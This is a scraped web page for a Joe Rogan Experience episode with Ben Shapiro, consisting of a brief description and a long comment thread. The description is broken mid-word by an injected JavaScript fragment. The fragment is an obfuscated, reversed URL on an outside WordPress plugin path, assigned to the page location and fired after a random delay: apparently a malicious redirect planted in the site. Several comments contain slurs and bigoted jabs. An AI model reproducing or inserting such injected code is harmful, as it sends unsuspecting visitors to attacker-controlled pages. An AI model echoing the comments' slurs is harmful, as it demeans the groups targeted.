Joe Rogan Experience #993 – Ben Shapiro

Ben Shapiro is editoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor-in-chief of the Daily Wire, syndicated columnist, and host of “The Ben Shapiro Show” is available on SoundCloud and iTunes.

Youtube Channel

49 thoughts on “Joe Rogan Experience #993 – Ben Shapiro”

  1. The Guy That Talks Shit On YouTube says:

    Ben Is The Man, I REALLY hope I see him running for President one day! He's so knowledgeable and rational… Tells it like it is.. I wonder how well versed he is in "polictics politics".. I'd fuckin Vote for him!

  2. Thisisnotmyrealname8 says:

    Trump is real, and he's smarter than Shapiro.

  3. Eric Thomas says:

    Crybabies are blossoming

  4. Eric Thomas says:

    Get up go out and work hard! The American dream!

  5. Thisisnotmyrealname8 says:

    I can listen to Shapiro about probably everything, except when he starts in on Trump. He's still upset that he predicted Trump to lose, and was wrong. Joe Rogan is a good conversationalist, but he's also a douche bag.

  6. Eitan Levy Keating says:

    You should really have Michael Shellenberger on the show, you don't seem to knowledgeable about Nuclear energy and that guy knows it all!

  7. arpboy says:

    …Piers Morgan is a clown. Shapiro is an intellectual giant. Already. Rogan gets better with time…

  8. Renad Gharzeddine says:

    11k libtards disliked this video

  9. Bossman 1 says:

    hey ben! come and speak in the UK, pleeease

  10. Biggidy Boy says:

    When ben is speaking change the speed to 0.75. Your welcome

  11. noxxi knox says:

    "holywood is run by the… "
    "dopiest… jackasses""

  12. RicAndTor says:

    Interview me man

  13. Mark Metternich Photography, LLC says:

    What is wrong with human beings that when they disagree they have to be violent, demonize and other ridiculously stupid behaviors? Neanderthalic!!! Ben is extremely sound and intelligent if you do not agree with him. GROW UP PEOPLE!

  14. That Guy says:

    Thanks for kind word…. love from Texas

  15. Matthew McGrath says:

    @11:18 I am a White Male of Irish descent. I will not now nor ever apologize for being white. I will never apologize for what Dead People did before I was born. I owe no one anything. Except God.. I do not think in doing those things that Racism was go away, nor will it fix any I'll feelings that those certain individuals have. And to that point by doing those things what does that solve? Does it go and erase the offense that was committed by the past? Never forget history, learn from it but move forward..

  16. Mexico City says:


    I wonder what Jaime edited out to please his masters at Google/YouTube…

  17. Step Ladder says:

    lol… jew hat

  18. Breck Nuckolls says:

    unreal combo

  19. Matthew Stull says:

    i gottA get ben's headphones. that top speaker must rocK !!

  20. D Moore says:

    Almost 2 years later. Ben isn't back on. Yet they live in the same city.

  21. XLN says:

    I made a parody of this on my Youtube Channel, check it out please

  22. Twana H says:

    I love you Ben but Joe's story at 19:06 explains why Black people don't want White liberals in their "safe spaces": they're full of sh*t…

  23. Arvin Esmaeili says:

    28:51 lol “plus Mexicans”?? What is that suppose to mean bro? So you just exclude Mexicans as part of the population in Los Angeles

  24. Matt Spurrell says:

    Why are people on the left so violent and aggressive.

  25. Mitchell Waltmann says:

    I blacked out once from drinking. I was 17, and it was the first time I had access to about as much alcohol as I possibly wanted. Naturally, as a dumb kid, I wasn’t paying attention and I took like 10 shots and two beers in the first hour. Then, I woke up slouched against the bedside table covered in vomit and piss. Apparently I just kept going back for shots, until eventually my buddy put me in bed (although I tried to refuse and kept getting back up). I also fell something like 7 or 8 times, none of which I remember. Blacking out is scary because your brain is gone but your body just keeps trying to party.

  26. usmcrex says:

    Water pollution and Earthquakes due to fracking is fake according to this fool. He said, LGBT is 1/4 Native Americans. I call BS! Joe kisses everyone’s ass. He always does a great job of just letting his guests talk and he listen.

  27. Toni Tone says:

    Tax the Teslas and distribute it. Start there!

  28. Ryan Hull says:

    Too bad about 90 percent of women could beat the fuck out of Ben Shapiro lmao

  29. SouthernIllin' 88 says:

    Bwahaha. "Only 100,000 people" My hometown has a population of about 350. Best place in the world.

  30. Wilson says:

    Its mind boggling how little Ben knows about climate change and its consequences

  31. J Duke says:

    You need to get Judge Jeanie Pirro on JRE …

  32. shane heath says:

    First time hearing this guy talk, thought he was a little egotistical, but overall very informed and rational.

  33. JUSTiN says:


  34. Ace Ventura says:

    The left wants the downfall of America. Socialism is key to their order.

  35. Tracy Spose says:

    Alex Jones reminds me of auctioneers when he speaks, but he says a whole lot of interesting shit.

  36. Tracy Spose says:

    Censorship is fascist. We shouldn't tolerate fascism in corporations any more than in gov…really, if you think about it, they have become one.

  37. Tracy Spose says:

    White privilege, as it's used today, by all races, is just more racism. It profits the corrupt system because it keeps us divided and impotent.

  38. Tracy Spose says:

    The left vs right is equally as dividing as racism. Even worse the constitution gives no power, authority, nor checks and balances to parties. Every branch of gov is fully defined, but no mention of parties. They are corrupt, private corporations that steal our tax dollars and corrupt our vote. I agree that the federal gov is way top heavy, but the State n local govs are also corrupted by the thieving parties.

  39. Tracy Spose says:

    You should take a look at local zoning ordinances that make people get permission to change out their front door.

  40. Tracy Spose says:

    Clinton is a traiter and a totally nasty person.

  41. Алерт Алертов says:

    What kind of headphone model on the Ben? must be very comfortable with good support

  42. Tim Whiting says:

    He needs to get ben back 2019 !!!! Thanks joe , you introduced me to ben shapiro n I love listening to him.

  43. celeb no.1776 says:

    look at laverne cox
    and then look at michelle obama!!

  44. One Sparky says:

    Traps are gay

  45. J says:

    My kids were taken because I had a beer..

  46. Dceker96 says:

    less respect for ben, says trump is dumb but do you just stumble into a presidency, or become a billionaire by being dumb. Alot of controversial things trump said was to gain free media coverage during his campaign instead of using his own money. smart or dumb?

  47. Niksatar 25 says:

    I woke up and this was in my history. I dont remember watching this.

  48. Steve VanWagner says:

    These so called woke are miss using the word , those that are woke need no safe space , are intelligent and articulate, and look beyond whats taught

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